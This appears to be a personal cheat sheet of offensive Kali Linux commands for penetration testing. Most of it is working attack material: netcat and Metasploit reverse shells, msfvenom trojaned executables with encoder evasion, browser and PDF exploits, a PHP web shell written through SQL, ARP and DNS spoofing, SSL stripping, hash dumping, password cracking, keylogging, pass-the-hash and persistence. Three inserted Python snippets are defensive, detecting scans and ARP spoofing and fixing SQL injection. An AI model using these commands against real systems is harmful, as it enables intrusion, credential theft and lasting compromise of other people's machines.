Applications to download:
Nessus - security scanner
http://www.tenable.com/products/nessus-home
Running application daemon:
/etc/init.d/nessusd start
Configuration:
https://kali:8834/
After the application's first startup it displays an interface for creating a user to log in to the application.
Next it displays a form for entering the activation key, which is sent to the e-mail address submitted during registration
on the producer's webpage.
Next the application initializes itself, downloads the signature database and configures the signatures.
This process can take a long time and uses about 100% of CPU time, so be prepared to wait quite a while.
I started the process in the late evening just before going to sleep and when I woke up in the morning the application
was ready for work.
mingw-w64 - provides compilation of 64-bit Windows programs in a Linux environment:
Make sure that the following repositories are available in the /etc/apt/sources.list config file:
# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
If not, paste them in and install the application with the following commands:
apt-get clean
apt-get update
apt-get upgrade
apt-get install mingw-w64
Tests if the specified port (5500) is open on the remote machine:
nc -v 192.168.10.1 5500
Tests if sending a FIN packet to a closed port does not result in receiving an RST/ACK packet:
sudo nmap -sF
Tests if sending an ACK packet that is not part of an established session does not cause a response:
sudo nmap -sA
Tests if the specified UDP port (5500) is open on the remote machine:
sudo hping3 -2 -p 5500 192.168.8.100
Tests whether sending an ICMP echo reply for an ICMP echo request that the remote machine never sent results in no response:
sudo hping3 -1 --icmptype echo-reply 192.168.8.100
Sends one ICMP echo packet to a remote host:
ping -c 1 192.168.8.100
Sends an ICMP echo packet with no data after its header to a remote host:
sudo nmap -sP 192.168.8.100
or:
ping -s 0 192.168.8.100
Broadcast addresses:
224.0.0.0 - 239.255.255.255
TCP connect scanning of a specified machine (root privileges are not required):
nmap -P0 -sT 192.168.8.100
or:
nmap -sT -n 192.168.8.100 --max-rtt-timeout 500ms
TCP SYN scanning of a specified machine:
sudo nmap -P0 -sS 192.168.8.100
or (without option specifying scanning type, because TCP SYN scanning is a default one):
sudo nmap -n 192.168.8.100 --max-rtt-timeout 500ms
TCP FIN scanning of a specified machine:
sudo nmap -P0 -sF 192.168.8.100
TCP XMAS scanning of a specified machine:
sudo nmap -P0 -sX 192.168.8.100
TCP NULL scanning of a specified machine:
sudo nmap -P0 -sN 192.168.8.100
TCP ACK scanning of a specified machine:
sudo nmap -P0 -sA 192.168.8.100
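The scan types above differ only in which TCP flags the probe carries and in what the target's reply reveals. As an added example (not part of the original notes), the Python below classifies constructed flag records the way nmap names them, works out what each reply leaks following the RFC 793 behaviour nmap relies on, and reports per source how many stealth probes drew an RST; that is the condition the FIN and ACK tests earlier on this page check for.

```python
# TCP flag bits as laid out in the header's flags byte.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag combinations that never open a legitimate connection; nmap's -sN, -sF, -sX, -sA.
SCAN_NAMES = {0: "null", FIN: "fin", FIN | PSH | URG: "xmas", ACK: "ack"}

# Constructed sample of (src, dst_port, flags, target_reply) records, the kind of
# tuple a capture tool can export. Not real traffic. reply is "SYN/ACK", "RST",
# "ICMP" (port unreachable) or None (silently dropped).
SAMPLE = [
    ("192.168.8.50", 22, SYN, "SYN/ACK"),          # normal handshake opener, port open
    ("192.168.8.50", 80, SYN, "RST"),              # normal handshake opener, port closed
    ("192.168.8.77", 22, 0, None),                 # NULL probe, no reply
    ("192.168.8.77", 23, FIN, "RST"),              # FIN probe answered with RST
    ("192.168.8.77", 25, FIN | PSH | URG, "RST"),  # XMAS probe answered with RST
    ("192.168.8.77", 443, ACK, None),              # lone ACK, dropped by the firewall
    ("192.168.8.50", 22, ACK | PSH, None),         # data segment of an established connection
]


def classify_probe(flags):
    """Name the nmap probe type that a bare TCP segment with these flags matches."""
    if flags & SYN and not flags & ACK:
        return "syn"
    return SCAN_NAMES.get(flags, "other")


def infer_port_state(probe, reply):
    """What the probing side learns from the reply, i.e. how nmap labels the port.
    A compliant stack answers RST for closed ports and stays silent for open ones,
    which is exactly the leak a stateful firewall removes by dropping the probe."""
    if probe == "syn":
        return {"SYN/ACK": "open", "RST": "closed"}.get(reply, "filtered")
    if probe in ("null", "fin", "xmas"):
        if reply == "RST":
            return "closed"
        if reply == "ICMP":
            return "filtered"
        return "open|filtered"
    if probe == "ack":
        return "unfiltered" if reply == "RST" else "filtered"
    return "unknown"


def audit(records):
    """Per source address: how many stealth probes it sent and how many of them
    drew an RST, i.e. how many closed ports the target revealed to it."""
    report = {}
    for src, _port, flags, reply in records:
        probe = classify_probe(flags)
        if probe in ("null", "fin", "xmas", "ack"):
            entry = report.setdefault(src, {"probes": 0, "leaked": 0})
            entry["probes"] += 1
            if infer_port_state(probe, reply) in ("closed", "unfiltered"):
                entry["leaked"] += 1
    return report


if __name__ == "__main__":
    for src, stats in audit(SAMPLE).items():
        print(f"{src}: {stats['probes']} stealth probes, {stats['leaked']} answered with RST")
```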
Scans the UDP ports of the specified machine:
sudo nmap -P0 -sU 192.168.8.100
or:
sudo nmap -sU -n 192.168.8.100 --max-rtt-timeout 500ms
Scans the specified network for an open SSH port:
sudo nmap -P0 -p 22 -sS 192.168.8.0/24
Detects the version of the service listening on a specified common port (80):
sudo nmap -sV -P0 -p 80 -n 192.168.8.100
TCP SYN scanning of the specified machine (192.168.8.100) with 10.0.0.1 as the source address using the eth0 interface:
sudo nmap -P0 -sS -S 10.0.0.1 -e eth0 192.168.8.100
Runs netcat as a TCP server listening on port 5001. The program waits for data sent over the network and after receiving it
dumps it to standard output and exits:
nc -l 5001
Runs netcat as a UDP server listening on port 5002. The program waits for data sent over the network and after receiving it
dumps it to standard output and exits:
nc -u -l 5002
Sends the text specified after the echo command to the TCP server listening on port 5001 on the specified remote machine using the nc (netcat) program:
echo "To jest napis 12345" | nc 192.168.8.100 5001
Sends 10 bytes of 0xa5 to the UDP server listening on port 5002 on the specified remote machine using the nc (netcat) program:
perl -e 'print "\xa5"x10' | nc -u 192.168.8.100 5002
Restarts the networking service (e.g. after changes made in the /etc/network/interfaces file):
service networking restart
Runs the netcat application in server mode listening on port 1234:
nc -lvtp 1234
Sends data to the server listening on port 1234 on the 127.0.0.1 (localhost) machine:
nc -vt 127.0.0.1 1234
Runs netcat as a server listening on port 1234. Every incoming line of text is processed by the shell
/bin/sh and the result is sent back to the client:
nc -lvtp 1234 -e /bin/sh
Runs netcat as a client connecting to the server listening on port 1234 of the local machine and gives the server
the ability to execute shell commands on the client and obtain their results:
nc -vt 127.0.0.1 1234 -e /bin/sh
Runs postgresql server service:
systemctl start postgresql
Initializes database for metasploit:
msfdb init
Runs metasploit console:
msfconsole
Searches Metasploit's database for an exploit that takes advantage of the vulnerability with the specified code number (ms08-067):
msf> search ms08-067
Displays specified exploit's details:
msf> info exploit/windows/smb/ms08_067_netapi
Switches metasploit console context to the specified exploit's module:
msf> use windows/smb/ms08_067_netapi
Displays options necessary for running selected module/exploit:
msf exploit(ms08_067_netapi)> show options
Sets value of specified option (here RHOST):
msf exploit(ms08_067_netapi)> set RHOST 192.168.10.100
Displays operating systems that are vulnerable to the selected module/exploit:
msf exploit(ms08_067_netapi)> show targets
Sets the target operating system (the number is taken from the list generated by the "show targets" command):
msf exploit(ms08_067_netapi)> set target NUMBER
Displays payloads that are compatible with selected module/exploit:
msf exploit(ms08_067_netapi)> show payloads
Runs selected exploit:
exploit
Exits the meterpreter shell that was started after a successful break-in to the victim system:
meterpreter> exit
Selects payload of type reverse shell for the module/exploit:
msf exploit(ms08_067_netapi)> set payload windows/shell_reverse_tcp
Exits msfconsole console:
msf exploit(ms08_067_netapi)> exit
Program that generates payloads for Metasploit:
msfvenom -h
Displays available payloads list:
msfvenom -l payloads
Displays options available for selected payload (windows/meterpreter/reverse_tcp):
msfvenom -p windows/meterpreter/reverse_tcp --payload-options
Displays available payload formats:
msfvenom --help-formats
Generates payload.exe executable that runs meterpreter shell connecting with specified host on specified port:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.101 LPORT=443 --platform windows --arch x86 -f exe >payload.exe
Starts a handler for connections incoming from the victim systems that executed the payload.exe file generated above:
msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.10.101
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit
The last line of the snippet above creates a process listening on port 443.
Uses the auxiliary scanner/smb/pipe_auditor module to display the list of pipes listening on the SMB server on the remote machine:
msf> use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor)> set RHOSTS 192.168.10.100
msf auxiliary(pipe_auditor)> exploit
Shell command that updates modules/exploits Metasploit's database:
msfupdate
Displays all scripts (in the /usr/share/nmap/scripts directory) belonging to the 'default' category:
nmap --script-help default
Displays details on the specified script (here nfs-ls):
nmap --script-help nfs-ls
Scans the specified host to reveal open ports and runs all scripts belonging to the 'default' category on each port found:
nmap -sC 192.168.10.100
or (equivalent):
nmap --script=default 192.168.10.100
Scans the specified host to reveal open ports and runs the specified (nfs-ls) script on each port found:
nmap --script=nfs-ls 192.168.10.100
Runs the Metasploit console and checks whether an FTP service is listening on the specified hosts (192.168.10.100-192.168.10.110
and 192.168.56.1) and whether it allows anonymous access:
msfconsole
msf> use scanner/ftp/anonymous
msf> set RHOSTS 192.168.10.100-110 192.168.56.1
msf> exploit
Checks if the specified host is vulnerable to the selected exploit without running it:
msfconsole
msf> use windows/smb/ms08_067_netapi
msf> set RHOST 192.168.10.100
msf> check
Checks website on specified host for known vulnerabilities:
nikto -h 192.168.10.100
Attempts to log in to the WebDAV panel on the specified host using default credentials:
cadaver http://192.168.10.100/webdav
Sends the test.txt file to the remote machine:
dav:/webdav/> put test.txt
Checks on the mail server whether the specified user exists:
nc 192.168.10.100 25
VRFY username
^D
Turns on IP packet forwarding on the current machine (e.g. 192.168.10.101) and poisons the ARP cache of host 192.168.10.100 to
make it think that 192.168.10.101 is now 192.168.10.110:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.10.100 192.168.10.110
Now do the same for 192.168.10.110 to make it think that 192.168.10.101 is 192.168.10.100 (from now on 192.168.10.101
forwards packets between 192.168.10.100 <=> 192.168.10.110):
arpspoof -i eth0 -t 192.168.10.110 192.168.10.100
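ARP poisoning as described above leaves a recognizable trace on the wire: one MAC address starts answering for two IPs, and a host's known MAC changes mid-capture. The following Python detector is an added example (not from the original notes); its tcpdump-style ARP reply lines are constructed, with 192.168.10.101 playing the forwarding host and 192.168.10.100 / 192.168.10.110 the two poisoned victims.

```python
import re
from collections import defaultdict

# Constructed ARP reply lines in tcpdump's text format (not a real capture).
# The first three lines are the honest state of the LAN; the last two are the
# replies the forwarding host injects into both victims' caches.
SAMPLE_ARP = """\
ARP, Reply 192.168.10.100 is-at 08:00:27:11:11:11, length 28
ARP, Reply 192.168.10.110 is-at 08:00:27:22:22:22, length 28
ARP, Reply 192.168.10.101 is-at 08:00:27:aa:bb:cc, length 28
ARP, Reply 192.168.10.110 is-at 08:00:27:aa:bb:cc, length 28
ARP, Reply 192.168.10.100 is-at 08:00:27:aa:bb:cc, length 28
"""

REPLY_RE = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def detect_arp_spoofing(capture_text):
    """Return alert strings for (a) an IP whose MAC changes during the capture and
    (b) a MAC that answers for more than one IP, the pattern arpspoof produces
    when it poisons both ends of a conversation. A DHCP lease moving to a new
    machine also triggers (a), so alerts still need a human look."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for line in capture_text.splitlines():
        m = REPLY_RE.search(line)
        if not m:
            continue  # requests and non-ARP lines carry no is-at binding
        ip, mac = m.group(1), m.group(2).lower()
        previous = ip_to_mac.get(ip)
        if previous and previous != mac:
            alerts.append(f"MAC change for {ip}: {previous} -> {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"{mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP):
        print(alert)
```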
Translates specified domain address to IP address:
nslookup www.google.pl
Poisons DNS with dnsspoof command:
cat hosts.txt
192.168.10.101 www.google.pl
dnsspoof -i eth1 -f hosts.txt
Catches all network traffic between 192.168.10.1 gateway and 192.168.10.110 host:
ettercap -Ti eth0 -M arp:remote /192.168.10.1/ /192.168.10.110/
Carries out an SSL stripping attack:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
Generates a PHP script that opens a meterpreter shell after a webpage containing the script is visited. The script opens no extra
window and connects to the specified host (192.168.56.101) on the specified port number (2323):
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=2323 -f raw >meterpreter.php
Runs the listening process to catch connections from the script described above:
msfconsole
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST 192.168.56.101
msf> set LPORT 2323
msf> exploit
After the connection is made we can query for the current username:
meterpreter> getuid
We can also dump the password hashes of the victim Windows system:
meterpreter> hashdump
Makes MySQL write an arbitrary script onto the victim machine:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"
Searches Metasploit's module/exploit database for the specified system:
msf> search drupal
Obtaining information about specified module/exploit:
msf> info unix/webapp/php_xmlrpc_eval
Crawls the specified website (progmar.net.pl) and all linked pages up to 1 level deep for
words at least 5 characters long and saves them to the passwords.txt file:
cewl -w passwords.txt -d 1 -m 5 progmar.net.pl
Generates a dictionary of 7- and 8-character passwords. Each entry consists of the letters A and B:
crunch 7 8 AB
Guesses user names and their passwords on the specified POP3 server:
hydra -L userlist.txt -P passwords.txt 192.168.56.1 pop3
Guesses the password of user mzaleczny on the specified POP3 server:
hydra -l mzaleczny -P passwords.txt 192.168.56.1 pop3
In the Windows operating system the c:\windows\repair directory contains the following files:
sam - contains encrypted user names and hashes of their passwords
system - contains the system key used to encrypt the data in the file above.
The actual/production versions of the files above sit in the c:\windows\system32\config directory.
To extract user names and their password hashes run the following commands:
bkhive system xpkey.txt
samdump2 sam xpkey.txt
Save the result of the commands above (or the result of the "meterpreter> hashdump" command described above)
to a file "ntpasswords.txt" and issue the following command to guess the passwords:
john ntpasswords.txt
The john program can also be used to guess Linux users' passwords:
john --wordlist=dictionary.txt linux_passwords.txt
Metasploit's AllPorts payload is used to make a connection on the first port number that is not filtered by a firewall.
To do this, all ports are tried starting from 1:
msf exploit(ms08_067_netapi)> set payload windows/shell/reverse_tcp_allports
msf exploit(ms08_067_netapi)> show options
msf exploit(ms08_067_netapi)> exploit
The Aurora exploit uses an IE vulnerability to make a connection with a remote system and gain access to the system shell:
msf> use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora)> show options
msf exploit(ms10_002_aurora)> set SRVHOST 192.168.1.101
msf exploit(ms10_002_aurora)> set SRVPORT 80
msf exploit(ms10_002_aurora)> set URIPATH aurora
msf exploit(ms10_002_aurora)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora)> set LHOST 192.168.1.101
msf exploit(ms10_002_aurora)> exploit
Now when the victim visits the http://192.168.1.101/aurora address in his IE browser, the exploit will fire and the
attacker owning the 192.168.1.101 host will gain access to the victim's OS shell.
Connects to specified session:
msf exploit(ms10_002_aurora)> sessions -i SESSION_ID
Displays jobs running in background in Metasploit's console:
msf exploit(ms10_002_aurora)> jobs
Kills a job of specified ID in Metasploit's console:
msf exploit(ms10_002_aurora)> kill JOB_ID
Displays advanced parameters for selected module/exploit:
msf exploit(ms10_002_aurora)> show advanced
Makes the migrate.rb script run automatically with the -f parameter after a successful connection from the victim host.
It moves the Meterpreter shell into a newly started notepad process on the host (thanks to this we do not lose the connection
after closing the hung IE):
msf exploit(ms10_002_aurora)> set AutoRunScript migrate -f
Alternatively we can set the advanced parameter "PrependMigrate" to true. It will migrate the shell into a newly created
process even before the exploit fires.
msf exploit(ms10_002_aurora)> exploit
Prepares a malicious PDF and listens for callback connections:
msf> use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf)> show options
msf exploit(adobe_utilprintf)> exploit
msf exploit(adobe_utilprintf)> cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf)> systemctl start apache2
Catching connections from victim hosts (we run our handler as a background job):
msf exploit(adobe_utilprintf)> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set ExitOnSession false
msf exploit(handler)> exploit -j
Exploit for web browser with Java < 7 Update 11:
msf> use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean)> set SRVHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> set SRVPORT 80
msf exploit(java_jre17_jmxbean)> set URIPATH javaexploit
msf exploit(java_jre17_jmxbean)> set payload java/meterpreter/reverse_http
msf exploit(java_jre17_jmxbean)> set LHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> exploit
Applet exploit for web browser with Java:
msf> use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet)> set APPLETNAME CustomAppletName
msf exploit(java_signed_applet)> set SRVHOST 192.168.1.101
msf exploit(java_signed_applet)> set SRVPORT 80
msf exploit(java_signed_applet)> set URIPATH javaappletexploit
msf exploit(java_signed_applet)> set target 0
msf exploit(java_signed_applet)> set payload java/meterpreter/reverse_tcp
msf exploit(java_signed_applet)> set LHOST 192.168.1.101
msf exploit(java_signed_applet)> exploit
Module recognizing the web browser and applying all available exploits that might be successful:
msf> use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn)> set LHOST 192.168.1.101
msf auxiliary(browser_autopwn)> set URIPATH autopwn
msf auxiliary(browser_autopwn)> exploit
Displays all sessions with an active shell running on victim computers:
msf auxiliary(browser_autopwn)> sessions -l
Program for making social engineering attacks (sending malicious code in e-mail attachments, creating
phishing webpages, etc. - it is installed in Kali Linux by default):
setoolkit
In Kali Linux the /usr/share/windows-binaries directory stores a few executables that can be used to
carry malicious payloads (any other Windows exe binary can be used as well). Here is how to prepare a trojan:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 \
  -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
The process listening for incoming connections from meterpreter shells is run in the Metasploit console using the handler module:
msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit
Works as above but also runs 10 iterations of payload encoding with the x86/shikata_ga_nai encoder:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 \
  -x /usr/share/windows-binaries/radmin.exe -e x86/shikata_ga_nai -i 10 -k -f exe >radmin_coded.exe
Displays the list of encoders supported by the msfvenom program:
msfvenom -l encoders
Encoding a payload multiple times with different encoders:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 \
  -e x86/shikata_ga_nai -i 10 -f raw >radmin_coded.bin
msfvenom -p - -x /usr/share/windows-binaries/radmin.exe -k -f exe -a x86 --platform windows \
  -e x86/bloxor -i 2 >radmin_coded2.exe <radmin_coded.bin
Generates a payload as a C string:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f c >radmin.c
Generates a random text string of length 512:
cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512
Encrypts the input.exe executable with the hyperion.exe program and saves it as the output.exe executable:
wine hyperion.exe input.exe output.exe
Installs and runs a tftpd server in Kali Linux:
apt-get install atftpd
systemctl start atftpd
Downloads the plik.txt file from the remote server to a Windows machine running the cmd shell:
tftp -i 192.168.1.101 GET plik.txt
Uploads the plik.txt file from a Windows machine running the cmd shell to the remote server:
tftp -i 192.168.1.101 PUT plik.txt
Meterpreter scripts reside in /usr/share/metasploit-framework/scripts/meterpreter directory.
To run a script issue following command:
meterpreter> run script-name
You can obtain a script's help as below:
meterpreter> run script-name -h
Displays the list of running processes:
meterpreter> ps
Moves a meterpreter session into a process with id 1234:
meterpreter> run migrate -p 1234
Moves a meterpreter session to run as a background job:
meterpreter> background
Obtains the list of users logged on to the system of the specified session:
msf> use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users)> set SESSION 1
msf post(enum_logged_on_users)> exploit
Calling any WinAPI function, for example to check whether the current user is an admin:
msf> sessions -i 1
meterpreter> irb
>> client.railgun.shell32.IsUserAdmin
>> exit
Runs a set of exploits until a user with SYSTEM privileges is obtained or the exploits are exhausted:
meterpreter> getsystem
meterpreter> getuid
Returns to previous user privileges:
meterpreter> rev2self
Runs an exploit for Windows XP SP2/SP3 to elevate user privileges:
msf> use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf)> set SESSION 1
msf exploit(ms11_080_afdjoinleaf)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_080_afdjoinleaf)> set LHOST 192.168.1.101
msf exploit(ms11_080_afdjoinleaf)> exploit
Bypasses UAC (User Account Control) in Windows 7:
msf> use exploit/windows/local/bypassuac
msf exploit(bypassuac)> set SESSION 1
msf exploit(bypassuac)> exploit
The commands above open a meterpreter session with UAC disabled, so the commands below should work properly:
meterpreter> getuid
meterpreter> getsystem
Enters a Linux shell within the meterpreter session (of course the compromised machine must be running Linux):
meterpreter> shell
And issues some basic commands:
> whoami
> uname -a
> lsb_release -a
> udevadm --version
Searches local exploits database for udev program:
/usr/share/exploitdb/searchsploit udev
Runs nc as a server listening on 12345 port:
nc -lvp 12345
Connects to the netcat working as above and attaches a shell as the program handling its standard input:
nc 127.0.0.1 12345 -e /bin/bash
From now on, in the first of the two commands above you can issue Linux shell commands that will be executed remotely.
Searches from within the meterpreter session for files containing the phrase "password" in their names:
meterpreter> search -f password
Runs the key-logger embedded in meterpreter:
meterpreter> keyscan_start
Displays the captured keypresses:
meterpreter> keyscan_dump
Stops the key-logger:
meterpreter> keyscan_stop
Retrieves passwords stored by the WinSCP application on a Windows system:
msf> use post/windows/gather/credentials/winscp
msf post(winscp)> set session 1
msf post(winscp)> exploit
Displays list of users in Windows system:
cmd c:\> net users
Displays list of local admins in Windows system:
cmd c:\> net localgroup Administrators
After taking over one Windows host you can try to take over other hosts in the domain by using the psexec exploit:
msf> use exploit/windows/smb/psexec
msf exploit(psexec)> set RHOST 192.168.1.102
msf exploit(psexec)> set SMBUser username
msf exploit(psexec)> set SMBPass userpassword
msf exploit(psexec)> set SMBDomain GRUPA_ROBOCZA
msf exploit(psexec)> exploit
Uses the psexec module/exploit to log into a remote host knowing only the hash of the real password:
msf exploit(psexec)> set SMBPass password_LM_or_NTLM_hash
msf exploit(psexec)> exploit
Runs sshexec module/exploit to log into a remote Linux host:
msf> use exploit/multi/ssh/sshexec
msf exploit(sshexec)> set RHOST 192.168.1.102
msf exploit(sshexec)> set USERNAME user_name
msf exploit(sshexec)> set PASSWORD my_password
msf exploit(sshexec)> set payload linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec)> set LHOST 192.168.1.101
msf exploit(sshexec)> exploit
meterpreter> getuid
meterpreter> shell
> whoami
Loads incognito module to handle tokens in Windows system:
msf> load incognito
Lists the available tokens in the meterpreter shell:
meterpreter> list_tokens -u
Obtains specified user's privileges (associated to given 'COMPXP\\username' token):
meterpreter> impersonate_token COMPXP\\username
Starts an SMB server in a Windows domain environment that listens on port 445 and saves user password hashes to
the /root/johnpwfile file:
msf> use auxiliary/server/capture/smb
msf auxiliary(smb)> set JOHNPWFILE /root/johnpwfile
msf auxiliary(smb)> exploit
Next you can initiate SMB connections to the fake host 192.168.1.100 from within the compromised machine:
meterpreter> shell
C:\windows\system32> net use \\192.168.1.100\anything
Displays network configuration of host running meterpreter shell:
meterpreter> ifconfig
Routes all network traffic to the 192.168.80.0/24 network through session number 2 (which has a connection to a compromised
router in that network) - this is the so-called pivot:
msf> route add 192.168.80.0 255.255.255.0 2
Scans ports from within Metasploit shell:
msf> use scanner/portscan/tcp
msf auxiliary(tcp)> set RHOSTS 192.168.1.101
msf auxiliary(tcp)> exploit
Runs a socks4a proxy server in Metasploit:
msf> use auxiliary/server/socks4a
msf auxiliary(socks4a)> set SRVPORT 4040
msf auxiliary(socks4a)> exploit
Now in the /etc/proxychains.conf file change the line:
socks4 127.0.0.1 9050
to:
socks4 127.0.0.1 4040
From now on you can run programs outside Metasploit through the pivot network by using the proxychains application, e.g.:
root@kali:~# proxychains nmap -Pn -sT -sV -p 21,22,25,80,445
Creates a new user (martin) and assigns it to the domain in a domain environment:
C:\> net user martin mypassword /add /domain
Assigns user created above to the Administrators group:
C:\> net localgroup Administrators martin /add
Creates on the compromised Windows system a VisualBasic script that is executed after each system start and tries to connect
to the attacker's host every 10 minutes:
meterpreter> run persistence -r 192.168.1.100 -p 12345 -X -i 600
Runs burpsuite application:
Applications -> Web Applications Analysis -> burpsuite
Proxy server configuration in Firefox:
Menu Edit -> Preferences -> Advanced
There, switch to the "Network" tab and click the "Settings" button. The proxy server configuration window should open.
Example of injecting arbitrary code through variables processed by web applications:
http://someapp.pl/login.php?username=' OR '1'='1&password=' OR '1'='1
http://someapp.pl/item.php?id=4 or 1 in (show databases)
Automated extraction of information about a database:
sqlmap -u "http://someapp.pl/item.php?id=4" --dump
Attempt to obtain access to a shell on the machine on which SQL Server is running:
sqlmap -u "http://someapp.pl/item.aspx?id=4" --os-shell
The method uses SQL Server xp_cmdshell command.
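The login.php URL above works because the application splices the username and password straight into the SQL text. As an added example (not from the original notes) the Python below rebuilds that flaw against an in-memory SQLite table with a constructed admin row, feeds it the exact parameters carried by the page's URL, and shows the parameterized form of the same query rejecting them.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The injection URL from the notes above, taken verbatim.
LOGIN_URL = "http://someapp.pl/login.php?username=' OR '1'='1&password=' OR '1'='1"


def make_db():
    """Constructed sample database: a single account, plaintext for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The flawed pattern: query text built by concatenation, so a quote in the
    input ends the literal and the rest is parsed as SQL. For illustration only."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    # With the page's payload the statement becomes
    #   ... WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'
    # which is true for every row, so the first user is "authenticated".
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: bound parameters. The driver hands the values to the engine
    separately from the SQL text, so ' OR '1'='1 is compared as a plain string."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def params_from_url(url):
    """Pull username/password out of the query string exactly as a PHP app would
    see them in $_GET (no decoding is needed here; the URL carries them raw)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs["username"][0], qs["password"][0]


def demo():
    conn = make_db()
    user, pwd = params_from_url(LOGIN_URL)
    return {
        "injected": (user, pwd),
        "vulnerable": login_vulnerable(conn, user, pwd),   # 'admin' without the password
        "safe": login_safe(conn, user, pwd),               # None: payload treated as data
        "legit_safe": login_safe(conn, "admin", "s3cret"), # 'admin': real credentials still work
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```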
All Metasploit's exploits reside in following directory:
/usr/share/metasploit-framework/modules/exploits